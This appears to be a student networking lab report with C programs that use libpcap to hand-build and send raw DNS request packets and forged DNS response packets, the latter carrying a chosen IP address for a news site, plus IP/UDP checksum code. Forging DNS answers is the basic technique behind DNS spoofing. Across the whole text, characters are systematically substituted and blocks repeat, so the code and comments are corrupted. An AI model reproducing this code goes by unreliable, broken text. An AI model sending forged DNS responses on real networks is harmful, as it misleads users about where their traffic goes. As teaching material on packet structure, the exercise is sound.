/* ????????????????? &ao pointer chi toi 5ung nho tuong ung trong packet ???????????????? */ eth ! (struct ethernet_header )(packet); /****************************&0 GE ;0+$8$E+ ! ***************************/ ip ! (struct ip_header ) (packet " #$%E_E&'); /****************************&0 GE ;0+$8$E+ 7 ***************************/ udp ! (struct udp_header )(packet " #$%E_E&' " si,eo%(struct ip_header)); /****************************&0 GE ;0+$8$E+ H ***************************/ dns ! (struct dns_header )(packet " #$%E_E&' " si,eo%(struct ip_header) " si,eo%(struct udp_header)); // Puery -ame /ointerR 3_name !(u_char )(packet " #$%E_E&' " si,eo%(struct ip_header) " si,eo%(struct udp_header) " si,eo%(struct dns_header)); // +ns Puery /ointerR dns_3r !(struct dns_3uery )(packet " #$%E_E&' " si,eo%(struct ip_header) " si,eo%(struct udp_header) " si,eo%(struct dns_header)"siFe_3_name); /* Ethernet 'eader */ bcopy(BC *!C *7C *HC *"C *JC *(B,(eth&$ether_shost,(); // #ource ;*1 *ddress /****************************&0 GE ;0+$8$E+ " ***************************/ bcopy(BC G!C G7C GHC G"C GJC G(B,(eth&$ether_dhost, (); // +estination ;*1 *ddress bcopy(BC 9:C 99B,(char )(eth&$ether_type,7); // &ype $/ =9 9:99> /* $/ 'eader */ ip&$ip_5hl ! 9 "J; ip&$ip_tos ! 9 99; ip&$ip_id ! htons(9 f!a"); ip&$ip_off ! 9; ip&$ip_ttl ! ("; ip&$ip_p ! .+/_/)0,; ip&$ip_sum ! 9;
// $/ 5ersion " @ length Q J words =79 bytes> // +ifferentiated #er5ices 8ield // $dentification // time to li5e // .+/ protocol // ip checksum =44>
(ip&$ip_src).s_addr ! inet_addr(B!.7.H."B); // source ip address /****************************&0 GE ;0+$8$E+ J ***************************/ (ip&$ip_dst).s_addr ! inet_addr(B(.2.:.OB); // destination ip address /* .+/ 'eader */ udp&$udp_sport ! htons("999); /****************************&0 GE ;0+$8$E+ ( ***************************/ udp&$udp_dport ! htons(JH); // destination port udp&$udp_sum ! 9; // udp checksum =44> /* +-# 'eader */ dns&$id!htons(9 **GG); dns&$flags!htons(9 9!99); dns&$3_count!htons(9 99!); dns&$ans_count!9; dns&$auth_count!9; dns&$add_count!9; // // // // // // transaction $+ flags =standard 3uery> number of 3uestion number of answer number of authority number of resource
/* +-# PueryI 3uery_name, dns 3uery header */ // 1on5ert hostname to dns format and store in memory where 3_name point to +-#_name_con5erter(host,3_name); dns_3r&$3_type!htons(!); // type of the host dns_3r&$3_class!htons(!); // class /* .pdate ,ength $p 'eader and .dp 'eader */ udp&$udp_len! htons(si,eo%(struct udp_header) " si,eo%(struct dns_header)"siFe_3_name"si,eo%(struct dns_3uery)); ip&$ip_len ! htons(si,eo%(struct ip_header)) " udp&$udp_len; // total length siFe_ip ! $/_',(ip) "; /* send packet ( times */ %or (i!9; i -! J; i"") { result ! pcap_sendpacket (descr,packet,#$%E_E&'"ntohs(ip&$ip_len)); i%(result !! 9) printf(BL/acket sent sucessfullyMCnB); e#se printf(BL/acket sent failureMCnB); } } return 9;
@esult with capturing packet% A @ecei e ; dns re$uest packets
A 3thernet Header
A ', Header (with checksum error&
A UD, Header
A Dns Buery
II. DNS packet response #odify dns_response_gen.c to generate the dns response that ha e the • source #+5% -6 -7 -8 -9 -: -; • destination #+5% +6 +7 +8 +9 +: +; • source port% :8 • destination port% 9<<<
• Transaction 'D% ++-• source ', address%;.=.>.? • destination ', address% 6.7.8.9 • dns response% the ip address of / ne"press.net0 is /666.;:.79>.6870 Answer% Dntai_dns_response_v1.c (without ip, udp checksum )
#include <string.h> #include <stdlib.h> #include <sys/socket.h> #include <arpa/inet.h> #include <netinet/in.h> #include <unistd.h> #include <pcap.h> /* Ethernet headers are #define #$%E_E&' !" //strlen //malloc //you know what this is for //inet_addr , inet_ntoa , ntohs etc //getpid always e actly !" bytes */
/* Ethernet addresses are ( bytes */ #define E&'E)_*++)_,E- ( /* .+/ /)0&010, */ #define .+/_/)0, !2 struct dns_answer { u_short a_name; u_short a_type; u_short a_class; u_char a_ttl["]; u_short a_len; struct in_addr a_addr; }; struct dns_3uery { u_short 3_type; u_short 3_class; }; /* /* /* /* /* answer host name */ answer host type */ answer host class */ time to li5e cost " bytes */ length */ /* address of host */
/* type of the host */ /* class */
struct ethernet_header { u_char ether_dhost[E&'E)_*++)_,E-]; u_char ether_shost[E&'E)_*++)_,E-]; u_short ether_type; }; /* $/ header */ struct ip_header { u_char ip_5hl; u_char ip_tos; u_short ip_len; u_short ip_id; u_short ip_off; #define $/_)8 9 :999 #define $/_+8 9 "999 #define $/_;8 9 7999 #define $/_088;*#< 9 !fff u_char ip_ttl; u_char ip_p; u_short ip_sum; struct in_addr ip_src,ip_dst; }; #define $/_',=ip> #define $/_A=ip> struct udp_header { u_short udp_sport; u_short udp_dport; u_short udp_len; u_short udp_sum; }; struct dns_header { u_short id; u_short flags; u_short 3_count; /* /* /* /*
/* destination host address */ /* source host address */ /* $/4 *)/4 )*)/4 etc */
/* /* /* /* /* /* /* /* /* /* /* /*
5ersion << " 6 header length >> 7 */ type of ser5ice */ total length */ identification */ fragment offset field */ reser5ed fragment flag */ dont fragment flag */ more fragments flag */ mask for fragmenting bits */ time to li5e */ protocol */ checksum */
===ip>?>ip_5hl> @ 9 9f> ===ip>?>ip_5hl> >> "> source port */ destination port */ udp length */ udp checksum */
/* transaction $+ */ /* flags */ /* number of 3uestion entries */
};
u_short ans_count; u_short auth_count; u_short add_count;
/* number of answer entries */ /* number of authority entries */ /* number of resource entries */
/* functions */ 5oid print_app_info(5oid) { printf(B+ns response 5ersion ! writen by +o -hu &aiCnB); } 5oid +-#_name_con5erter(char host,char dns);
5oid +-#_name_con5erter(char host,char dns) { int len!strlen(host); dns[len"7]!9; int count!9; // 8or counting number of charaters from begin until meet a DdotD whi#e(len$9){ // Ehile host name length is larger than or e3ual to Fero i%(host[len&!]!!D.D) // 1ount from last character of host name if there is a DdotD { dns[len]!count; // #tore counted number into the dns name buffer count!9; // #et count to Fero for recount }e#se{ dns[len]!host[len&!]; // $f character is not a DdotD store it into the dns name buffer count""; } // $ncrease count len&&; // +ecrease len } dns[9]!count; } int main(int argc,char arg5[]) { u_char packet[J999]; char de5; // network de5ice char errb[/1*/_E))G.8_#$%E]; pcap_t descr; // session description bpf_u_intH7 net; // ip of de5ice bpf_u_intH7 mask; // subnet mask int i,result,siFe_ip; u_char host; print_app_info(); i%(argc'!H){ printf(B.sageI Ks <-etwork +e5iceDs -ame> <'ostname e Iwww.5ne press.net> CnB,arg5[9]); e it(!); }e#se{ de5!arg5[!]; host!arg5[7]; } // cheking for suitable network de5ice and store the ip,subnet mask for future use i%(pcap_lookupnet(de5,(net,(mask,errb) !! &!){ printf(BErrorI KsCnB,errb); e it(!); } // set the pcap description descr ! pcap_open_li5e(de5,G.8#$%,!,9,errb); i% (descr !! )*++){ printf(B#et description failedI KsCnB, errb); e it(!); } // Fero out the packet memset(packet,9,"9O(); /* // Ehen get to the last character // #tore the final counter into the dns name buffer
????????????????????? &ao mot goi tin L+-# )EP.E#&M ???????????????????????? Ethernet 'eader N $/ 'eader N .+/ 'eader N +-# 'eader N Puery -ame N +ns Puery */ struct struct struct struct struct ethernet_header eth; ip_header ip; udp_header udp; dns_header dns; dns_3uery dns_3r; dns_as; // // // // // pointer pointer pointer pointer pointer chi chi chi chi chi toi toi toi toi toi 5ung 5ung 5ung 5ung 5ung dau dau dau dau dau cua cua cua cua cua ethernet header ip header udp header dns header dns 3uery
u_char 3_name; struct dns_answer
// +ns name in 3uery // pointer chi toi 5ung dau cua dns answer // 'ostname length // kich thuoc cua 3uery name 5a dns 3uery header =7>
int host_len!strlen(host); int siFe_3_name!host_len"7;
/* ????????????????? &ao pointer chi toi 5ung nho tuong ung trong packet ???????????????? */ eth ! (struct ethernet_header )(packet); /****************************&0 GE ;0+$8$E+ ! ***************************/ ip ! (struct ip_header )(packet " #$%E_E&'); /****************************&0 GE ;0+$8$E+ 7 ***************************/ udp ! (struct udp_header )(packet " #$%E_E&' " si,eo%(struct ip_header)); /****************************&0 GE ;0+$8$E+ H ***************************/ dns ! (struct dns_header )(packet " #$%E_E&' " si,eo%(struct ip_header) " si,eo%(struct udp_header)); // Puery name /ointer 3_name !(u_char ) (packet " #$%E_E&' " si,eo%(struct ip_header) " si,eo%(struct udp_header) " si,eo%(struct dns_header)); // +ns Puery /ointer dns_3r !(struct dns_3uery ) (packet " #$%E_E&' " si,eo%(struct ip_header) " si,eo%(struct udp_header) " si,eo%(struct dns_header)"siFe_3_name); // +ns *nswer /ointer dns_as!(struct dns_answer ) (packet " #$%E_E&' " si,eo%(struct ip_header) " si,eo%(struct udp_header) " si,eo%(struct dns_header)"siFe_3_name"si,eo%(struct dns_3uery)); /* Ethernet 'eader */ bcopy(BC G!C G7C GHC G"C GJC G(B,(eth&$ether_shost,(); // #ource ;*1 *ddress /****************************&0 GE ;0+$8$E+ " ***************************/ bcopy(BC *!C *7C *HC *"C *JC *(B,(eth&$ether_dhost,(); // +estination ;*1 *ddress bcopy(BC 9:C 99B,(char )(eth&$ether_type,7); // &ype $/ =9 9:99> /* $/ 'eader */ ip&$ip_5hl ! 9 "J; ip&$ip_tos ! 9 99; ip&$ip_id ! htons(9 f!a"); ip&$ip_off ! 9; ip&$ip_ttl ! ("; ip&$ip_p ! .+/_/)0,; ip&$ip_sum ! 9; // $/ 5ersion " @ length Q J words =79 bytes> // +ifferentiated #er5ices 8ield // $dentification // time to li5e // .+/ protocol // ip checksum =44>
(ip&$ip_src).s_addr ! inet_addr(B(.2.:.OB); // source ip address /****************************&0 GE ;0+$8$E+ J ***************************/ (ip&$ip_dst).s_addr ! inet_addr(B!.7.H."B);; // destination ip address /* .+/ 'eader */ udp&$udp_sport ! htons(JH); // source port /****************************&0 GE ;0+$8$E+ ( ***************************/ udp&$udp_dport ! htons("999); // destination port udp&$udp_sum ! 9; // udp checksum =44> /* +-# 'eader */ dns&$id!htons(9 **GG); dns&$flags!htons(9 :!:9); dns&$3_count!htons(9 99!); dns&$ans_count!htons(9 99!); dns&$auth_count!9; dns&$add_count!9; // // // // // // transaction $+ flags =standard 3uery> number of 3uestion number of answer number of authority number of resource
/* +-# PueryI 3uery_name, dns 3uery header, dns 3uery answer */ // 1on5ert hostname to dns format and store in memory where 3_name point to +-#_name_con5erter(host,3_name); dns_3r&$3_type!htons(!); // type of the host dns_3r&$3_class!htons(!); // class /* +-# *nswer */ bcopy(BC c9C 9cB,(dns_as&$a_name,7);
dns_as&$a_type!htons(!); dns_as&$a_class!htons(!); bcopy(BC 99C 99C 9!C cHB,(dns_as&$a_ttl,"); dns_as&$a_len!htons(");
// type of the host // class
/****************************&0 GE ;0+$8$E+ 2 ***************************/ dns_as&$a_addr.s_addr ! inet_addr(B!!!.(J.7":.!H7B); /* .pdate ,ength $p 'eader and .dp 'eader */ udp&$udp_len! htons(si,eo%(struct udp_header) " si,eo%(struct dns_header)"siFe_3_name"si,eo%(struct dns_3uery)"si,eo%(struct dns_answer)); ip&$ip_len ! htons(si,eo%(struct ip_header)) " udp&$udp_len; // total length siFe_ip ! $/_',(ip) "; /* send packet ( times */ %or (i!9; i -! J; i"") { result ! pcap_sendpacket (descr,packet,#$%E_E&'"ntohs(ip&$ip_len)); i%(result !! 9) printf(BL/acket sent sucessfullyMCnB); e#se printf(BL/acket sent failureMCnB); } return 9; }
@esult with capturing packet% A @ecei e ; dns response packets
III.DNS packet response The checksum (of ip and udp headers) of the generated packets are wrong. Do the necessary to make them right. Answer% Dntai_dns_request_v..c (with ip, udp checksum )
#include <string.h> #include <stdlib.h> //strlen //malloc
#include <sys/socket.h> //you know what this is for #include <arpa/inet.h> //inet_addr , inet_ntoa , ntohs etc #include <netinet/in.h> #include <unistd.h> //getpid #include <pcap.h> /* Ethernet headers are always e actly !" bytes */ #define #$%E_E&' !" /* Ethernet addresses are ( bytes */ #define E&'E)_*++)_,E- ( /* .+/ /)0&010, */ #define .+/_/)0, !2 struct dns_3uery { u_short 3_type; u_short 3_class; }; /* type of the host */ /* class */
struct ethernet_header { u_char ether_dhost[E&'E)_*++)_,E-]; u_char ether_shost[E&'E)_*++)_,E-]; u_short ether_type; }; /* $/ header */ struct ip_header { u_char ip_5hl; u_char ip_tos; u_short ip_len; u_short ip_id; u_short ip_off; #define $/_)8 9 :999 #define $/_+8 9 "999 #define $/_;8 9 7999 #define $/_088;*#< 9 !fff u_char ip_ttl; u_char ip_p; u_short ip_sum; struct in_addr ip_src,ip_dst; }; #define $/_',=ip> #define $/_A=ip> struct udp_header { u_short udp_sport; u_short udp_dport; u_short udp_len; u_short udp_sum; }; /* /* /* /*
/* destination host address */ /* source host address */ /* $/4 *)/4 )*)/4 etc */
/* /* /* /* /* /* /* /* /* /* /* /*
5ersion << " 6 header length >> 7 */ type of ser5ice */ total length */ identification */ fragment offset field */ reser5ed fragment flag */ dont fragment flag */ more fragments flag */ mask for fragmenting bits */ time to li5e */ protocol */ checksum */
===ip>?>ip_5hl> @ 9 9f> ===ip>?>ip_5hl> >> "> source port */ destination port */ udp length */ udp checksum */
struct dns_header { u_short id; /* transaction $+ */ u_short flags; /* flags */ u_short 3_count; /* number of 3uestion entries */ u_short ans_count; /* number of answer entries */ u_short auth_count; /* number of authority entries */ u_short add_count; /* number of resource entries */ };
/* functions */ 5oid print_app_info(5oid){ printf(B+ns re3uest 5ersion 7 writen by +o -hu &aiCnB); } 5oid +-#_name_con5erter(char host,char dns);
5oid +-#_name_con5erter(char host,char dns) { int len!strlen(host); dns[len"7]!9; int count!9;
// 8or counting number of charaters from begin until meet a DdotD whi#e(len$9){ // Ehile host name length is larger than or e3ual to Fero i%(host[len&!]!!D.D) // 1ount from last character of host name if there is a DdotD { dns[len]!count; // #tore counted number into the dns name buffer count!9; // #et count to Fero for recount }e#se{ dns[len]!host[len&!]; // $f character is not a DdotD store it into the dns name buffer count""; } // $ncrease count len&&; // +ecrease len } dns[9]!count; // Ehen get to the last character // #tore the final counter into the dns name buffer
}
/* ???????????? 8.-1&$0- 1)E*&E 1'E1<#.; 08 .+/, $/ ???????????????? */ unsigned short csum (unsigned short buf, int nwords); unsigned short udp_csum (unsigned short len,unsigned short ip_src[],unsigned short ip_dst[],unsigned short buff[]); unsigned short csum (unsigned short { unsigned long sum!9; int i; %or (i!9; i-(nwords/7); i"") sum "! buf[i]; buf, int nwords)
sum ! (sum $$ !() " (sum ( 9 ffff); sum "! (sum $$ !(); } return 0sum;
unsigned short udp_csum (unsigned short len,unsigned short ip_src[],unsigned short ip_dst[],unsigned short buff[]) { unsigned short udp_protocol ! .+/_/)0,; unsigned short padding ! 9; unsigned long sum; int i; // 8ind out if the length of data is e5en or odd number. $f odd, add a padding byte Q 9 at the end of packet i% (len17 '! 9){ padding !!; buff[len]!9; } // $nitialiFe sum to Fero sum ! 9; // #um all the buffer in !( bit words %or(i!9;i-(len"padding)/7;i"") sum"!ntohs((unsigned short) buff[i]); // #um the pseudo header which contains source ip, destination ip, protocol number and length %or(i!9;i-7;i"") sum"!ntohs((unsigned short) ip_src[i]); %or(i!9;i-7;i"") sum"!ntohs((unsigned short) ip_dst[i]); sum"! (unsigned short)udp_protocol " (unsigned short)len; whi#e (sum$$!() sum ! (sum ( 9 8888) " (sum $$!(); } return 0sum; arg5[])
int main(int argc,char {
char errb[/1*/_E))G.8_#$%E]; pcap_t descr; // session description bpf_u_intH7 net; // ip of de5ice bpf_u_intH7 mask; // subnet mask int i,result,siFe_ip; u_char host; // host name to look up ip. E I 5ne press.net char de5; // network de5ice to capture. E I eth9 u_char packet[J999]; // packet is buffer to contain data print_app_info(); i%(argc'!H){ printf(B.sageI Ks <-etwork +e5iceDs -ame> <'ostname e Iwww.5ne press.net> CnB,arg5[9]); e it(!); }e#se{ de5!arg5[!]; host!arg5[7]; } // cheking for suitable network de5ice and store the ip,subnet mask for future use i%(pcap_lookupnet(de5,(net,(mask,errb) !! &!){ printf(BErrorI KsCnB,errb); e it(!); } // set the pcap description descr ! pcap_open_li5e(de5,G.8#$%,!,9,errb); i% (descr !! )*++){ printf(B#et description failedI KsCnB, errb); e it(!); } // Fero out the packet =LEthernetM N L$/M N L&1//.+/M N L*pplicationM> memset(packet,9,"9O();// packet la mang de chua du lieu bat duoc /* ????????????????????? &ao mot goi tin L+-# )EP.E#&M ???????????????????????? Ethernet 'eader N $/ 'eader N .+/ 'eader N +-# 'eader N Puery -ame N +ns Puery */ struct struct struct struct ethernet_header eth; ip_header ip; udp_header udp; dns_header dns; // // // // pointer pointer pointer pointer chi chi chi chi toi toi toi toi 5ung 5ung 5ung 5ung dau dau dau dau cua cua cua cua ethernet header ip header udp header dns header
u_char 3_name; int host_len!strlen(host); =5ne press.net co lenQ!H> struct dns_3uery dns_3r; int siFe_3_name!host_len"7;
// pointer chi toi 5ung dau chua 3uery_name // do dai cua 3uery name chinh la so ky tu cua host name // pointer chi toi 5ung dau cua dns 3uery // kich thuoc cua 3uery name 5a dns 3uery header =7>
/* ????????????????? &ao pointer chi toi 5ung nho tuong ung trong packet ???????????????? */ eth ! (struct ethernet_header )(packet); /****************************&0 GE ;0+$8$E+ ! ***************************/ ip ! (struct ip_header ) (packet " #$%E_E&'); /****************************&0 GE ;0+$8$E+ 7 ***************************/ udp ! (struct udp_header )(packet " #$%E_E&' " si,eo%(struct ip_header)); /****************************&0 GE ;0+$8$E+ H ***************************/ dns ! (struct dns_header )(packet " #$%E_E&' " si,eo%(struct ip_header) " si,eo%(struct udp_header)); // Puery -ame /ointerR 3_name !(u_char )(packet " #$%E_E&' " si,eo%(struct ip_header) " si,eo%(struct udp_header) " si,eo%(struct dns_header)); // +ns Puery /ointerR dns_3r !(struct dns_3uery )(packet " #$%E_E&' " si,eo%(struct ip_header) " si,eo%(struct udp_header) " si,eo%(struct dns_header)"siFe_3_name); /* Ethernet 'eader */ bcopy(BC *!C *7C *HC *"C *JC *(B,(eth&$ether_shost,(); // #ource ;*1 *ddress /****************************&0 GE ;0+$8$E+ " ***************************/ bcopy(BC G!C G7C GHC G"C GJC G(B,(eth&$ether_dhost, (); // +estination ;*1 *ddress bcopy(BC 9:C 99B,(char )(eth&$ether_type,7); // &ype $/ =9 9:99>
/* $/ 'eader */ ip&$ip_5hl ! 9 "J; ip&$ip_tos ! 9 99; ip&$ip_id ! htons(9 f!a"); ip&$ip_off ! 9; ip&$ip_ttl ! ("; ip&$ip_p ! .+/_/)0,; ip&$ip_sum ! 9;
// $/ 5ersion " @ length Q J words =79 bytes> // +ifferentiated #er5ices 8ield // $dentification // time to li5e // .+/ protocol // ip checksum =44>
(ip&$ip_src).s_addr ! inet_addr(B!.7.H."B); // source ip address /****************************&0 GE ;0+$8$E+ J ***************************/ (ip&$ip_dst).s_addr ! inet_addr(B(.2.:.OB); // destination ip address /* .+/ 'eader */ udp&$udp_sport ! htons("999); /****************************&0 GE ;0+$8$E+ ( ***************************/ udp&$udp_dport ! htons(JH); // destination port udp&$udp_sum ! 9; // udp checksum =44> /* +-# 'eader */ dns&$id!htons(9 **GG); dns&$flags!htons(9 9!99); dns&$3_count!htons(9 99!); dns&$ans_count!9; dns&$auth_count!9; dns&$add_count!9; // // // // // // transaction $+ flags =standard 3uery> number of 3uestion number of answer number of authority number of resource
/* +-# PueryI 3uery_name, dns 3uery header */ // 1on5ert hostname to dns format and store in memory where 3_name point to +-#_name_con5erter(host,3_name); dns_3r&$3_type!htons(!); // type of the host dns_3r&$3_class!htons(!); // class /* .pdate ,ength $p 'eader and .dp 'eader */ udp&$udp_len! htons(si,eo%(struct udp_header) " si,eo%(struct dns_header)"siFe_3_name"si,eo%(struct dns_3uery)); ip&$ip_len ! htons(si,eo%(struct ip_header)) " udp&$udp_len; // total length siFe_ip ! $/_',(ip) "; /* ./+*&E 1'E1<#.; 08 $/ 'E*+E) *-+ .+/ 'E*+E) */ ip&$ip_sum!9; ip&$ip_sum! (csum ((unsigned short ) (packet"#$%E_E&') ,siFe_ip)); udp&$udp_sum!9; udp&$udp_sum! htons(udp_csum(ntohs(udp&$udp_len), (u_short )((ip&$ip_src) , (u_short )((ip& $ip_dst), (unsigned short )udp)); /* send packet ( times */ %or (i!9; i -! J; i"") { result ! pcap_sendpacket (descr,packet,#$%E_E&'"ntohs(ip&$ip_len)); i%(result !! 9) printf(BL/acket sent sucessfullyMCnB); e#se printf(BL/acket sent failureMCnB); } } return 9;
@esult with capturing packet% A @ecei e ; dns re$uest packets
Answer% Dntai_dns_response_v..c (with ip, udp checksum )
#include <string.h> #include <stdlib.h> #include <sys/socket.h> #include <arpa/inet.h> #include <netinet/in.h> #include <unistd.h> #include <pcap.h> /* Ethernet headers are #define #$%E_E&' !" //strlen //malloc //you know what this is for //inet_addr , inet_ntoa , ntohs etc //getpid always e actly !" bytes */
/* Ethernet addresses are ( bytes */ #define E&'E)_*++)_,E- ( /* .+/ /)0&010, */ #define .+/_/)0, !2 struct dns_answer { u_short a_name; u_short a_type; u_short a_class; u_char a_ttl["]; u_short a_len; struct in_addr a_addr; }; struct dns_3uery { u_short 3_type; u_short 3_class; }; /* /* /* /* /* answer host name */ answer host type */ answer host class */ time to li5e cost " bytes */ length */ /* address of host */
/* type of the host */ /* class */
struct ethernet_header { u_char ether_dhost[E&'E)_*++)_,E-]; u_char ether_shost[E&'E)_*++)_,E-]; u_short ether_type; }; /* $/ header */ struct ip_header { u_char ip_5hl; u_char ip_tos; u_short ip_len; u_short ip_id; u_short ip_off; #define $/_)8 9 :999 #define $/_+8 9 "999 #define $/_;8 9 7999 #define $/_088;*#< 9 !fff u_char ip_ttl;
/* destination host address */ /* source host address */ /* $/4 *)/4 )*)/4 etc */
/* /* /* /* /* /* /* /* /* /*
5ersion << " 6 header length >> 7 */ type of ser5ice */ total length */ identification */ fragment offset field */ reser5ed fragment flag */ dont fragment flag */ more fragments flag */ mask for fragmenting bits */ time to li5e */
};
u_char ip_p; u_short ip_sum; struct in_addr ip_src,ip_dst;
/* protocol */ /* checksum */
#define $/_',=ip> #define $/_A=ip> struct udp_header { u_short udp_sport; u_short udp_dport; u_short udp_len; u_short udp_sum; }; /* /* /* /*
===ip>?>ip_5hl> @ 9 9f> ===ip>?>ip_5hl> >> "> source port */ destination port */ udp length */ udp checksum */
struct dns_header { u_short id; /* transaction $+ */ u_short flags; /* flags */ u_short 3_count; /* number of 3uestion entries */ u_short ans_count; /* number of answer entries */ u_short auth_count; /* number of authority entries */ u_short add_count; /* number of resource entries */ };
/* functions */ 5oid print_app_info(5oid) { printf(B+ns response 5ersion 7 writen by +o -hu &aiCnB); } 5oid +-#_name_con5erter(char host,char dns);
5oid +-#_name_con5erter(char host,char dns) { int len!strlen(host); dns[len"7]!9; int count!9; // 8or counting number of charaters from begin until meet a DdotD whi#e(len$9){ // Ehile host name length is larger than or e3ual to Fero i%(host[len&!]!!D.D) // 1ount from last character of host name if there is a DdotD { dns[len]!count; // #tore counted number into the dns name buffer count!9; // #et count to Fero for recount }e#se{ dns[len]!host[len&!]; // $f character is not a DdotD store it into the dns name buffer count""; } // $ncrease count len&&; // +ecrease len } dns[9]!count; } /* ???????????? 8.-1&$0- 1)E*&E 1'E1<#.; 08 .+/, $/ ???????????????? */ unsigned short csum (unsigned short buf, int nwords); unsigned short udp_csum (unsigned short len,unsigned short ip_src[],unsigned short ip_dst[],unsigned short buff[]); unsigned short csum (unsigned short { unsigned long sum!9; int i; %or (i!9; i-(nwords/7); i"") sum "! buf[i]; buf, int nwords) // Ehen get to the last character // #tore the final counter into the dns name buffer
sum ! (sum $$ !() " (sum ( 9 ffff); sum "! (sum $$ !(); return 0sum;
} unsigned short udp_csum (unsigned short len,unsigned short ip_src[],unsigned short ip_dst[],unsigned short buff[]) { unsigned short udp_protocol ! .+/_/)0,; unsigned short padding ! 9; unsigned long sum; int i; // 8ind out if the length of data is e5en or odd number. $f odd, add a padding byte Q 9 at the end of packet i% (len17 '! 9){ padding !!; buff[len]!9; } // $nitialiFe sum to Fero sum ! 9; // #um all the buffer in !( bit words %or(i!9;i-(len"padding)/7;i"") sum"!ntohs((unsigned short) buff[i]); // #um the pseudo header which contains source ip, destination ip, protocol number and length %or(i!9;i-7;i"") sum"!ntohs((unsigned short) ip_src[i]); %or(i!9;i-7;i"") sum"!ntohs((unsigned short) ip_dst[i]); sum"! (unsigned short)udp_protocol " (unsigned short)len; whi#e (sum$$!() sum ! (sum ( 9 8888) " (sum $$!(); return 0sum; } int main(int argc,char arg5[]) { u_char packet[J999]; char de5; // network de5ice char errb[/1*/_E))G.8_#$%E]; pcap_t descr; // session description bpf_u_intH7 net; // ip of de5ice bpf_u_intH7 mask; // subnet mask int i,result,siFe_ip; u_char host; print_app_info(); i%(argc'!H){ printf(B.sageI Ks <-etwork +e5iceDs -ame> <'ostname e Iwww.5ne press.net> CnB,arg5[9]); e it(!); }e#se{ de5!arg5[!]; host!arg5[7]; } // cheking for suitable network de5ice and store the ip,subnet mask for future use i%(pcap_lookupnet(de5,(net,(mask,errb) !! &!){ printf(BErrorI KsCnB,errb); e it(!); } // set the pcap description descr ! pcap_open_li5e(de5,G.8#$%,!,9,errb); i% (descr !! )*++){ printf(B#et description failedI KsCnB, errb); e it(!); } // Fero out the packet memset(packet,9,"9O(); /*
????????????????????? &ao mot goi tin L+-# )EP.E#&M ???????????????????????? Ethernet 'eader N $/ 'eader N .+/ 'eader N +-# 'eader N Puery -ame N +ns Puery */ struct struct struct struct struct ethernet_header eth; ip_header ip; udp_header udp; dns_header dns; dns_3uery dns_3r; dns_as; // // // // // pointer pointer pointer pointer pointer chi chi chi chi chi toi toi toi toi toi 5ung 5ung 5ung 5ung 5ung dau dau dau dau dau cua cua cua cua cua ethernet header ip header udp header dns header dns 3uery
u_char 3_name; struct dns_answer
// +ns name in 3uery // pointer chi toi 5ung dau cua dns answer // 'ostname length // kich thuoc cua 3uery name 5a dns 3uery header =7>
int host_len!strlen(host); int siFe_3_name!host_len"7;
/* ????????????????? &ao pointer chi toi 5ung nho tuong ung trong packet ???????????????? */ eth ! (struct ethernet_header )(packet); /****************************&0 GE ;0+$8$E+ ! ***************************/ ip ! (struct ip_header )(packet " #$%E_E&'); /****************************&0 GE ;0+$8$E+ 7 ***************************/ udp ! (struct udp_header )(packet " #$%E_E&' " si,eo%(struct ip_header)); /****************************&0 GE ;0+$8$E+ H ***************************/ dns ! (struct dns_header )(packet " #$%E_E&' " si,eo%(struct ip_header) " si,eo%(struct udp_header)); // Puery name /ointer 3_name !(u_char ) (packet " #$%E_E&' " si,eo%(struct ip_header) " si,eo%(struct udp_header) " si,eo%(struct dns_header)); // +ns Puery /ointer dns_3r !(struct dns_3uery ) (packet " #$%E_E&' " si,eo%(struct ip_header) " si,eo%(struct udp_header) " si,eo%(struct dns_header)"siFe_3_name); // +ns *nswer /ointer dns_as!(struct dns_answer ) (packet " #$%E_E&' " si,eo%(struct ip_header) " si,eo%(struct udp_header) " si,eo%(struct dns_header)"siFe_3_name"si,eo%(struct dns_3uery)); /* Ethernet 'eader */ bcopy(BC G!C G7C GHC G"C GJC G(B,(eth&$ether_shost,(); // #ource ;*1 *ddress /****************************&0 GE ;0+$8$E+ " ***************************/ bcopy(BC *!C *7C *HC *"C *JC *(B,(eth&$ether_dhost,(); // +estination ;*1 *ddress bcopy(BC 9:C 99B,(char )(eth&$ether_type,7); // &ype $/ =9 9:99> /* $/ 'eader */ ip&$ip_5hl ! 9 "J; ip&$ip_tos ! 9 99; ip&$ip_id ! htons(9 f!a"); ip&$ip_off ! 9; ip&$ip_ttl ! ("; ip&$ip_p ! .+/_/)0,; ip&$ip_sum ! 9;
// $/ 5ersion " @ length Q J words =79 bytes> // +ifferentiated #er5ices 8ield // $dentification // time to li5e // .+/ protocol // ip checksum =44>
(ip&$ip_src).s_addr ! inet_addr(B(.2.:.OB); // source ip address /****************************&0 GE ;0+$8$E+ J ***************************/ (ip&$ip_dst).s_addr ! inet_addr(B!.7.H."B);; // destination ip address /* .+/ 'eader */ udp&$udp_sport ! htons(JH); // source port /****************************&0 GE ;0+$8$E+ ( ***************************/ udp&$udp_dport ! htons("999); // destination port udp&$udp_sum ! 9; // udp checksum =44> /* +-# 'eader */ dns&$id!htons(9 **GG); dns&$flags!htons(9 :!:9); dns&$3_count!htons(9 99!); dns&$ans_count!htons(9 99!); dns&$auth_count!9; dns&$add_count!9; // // // // // // transaction $+ flags =standard 3uery> number of 3uestion number of answer number of authority number of resource
/* +-# PueryI 3uery_name, dns 3uery header, dns 3uery answer */ // 1on5ert hostname to dns format and store in memory where 3_name point to +-#_name_con5erter(host,3_name); dns_3r&$3_type!htons(!); // type of the host dns_3r&$3_class!htons(!); // class /* +-# *nswer */
bcopy(BC c9C 9cB,(dns_as&$a_name,7); dns_as&$a_type!htons(!); dns_as&$a_class!htons(!); bcopy(BC 99C 99C 9!C cHB,(dns_as&$a_ttl,"); dns_as&$a_len!htons(");
// type of the host // class
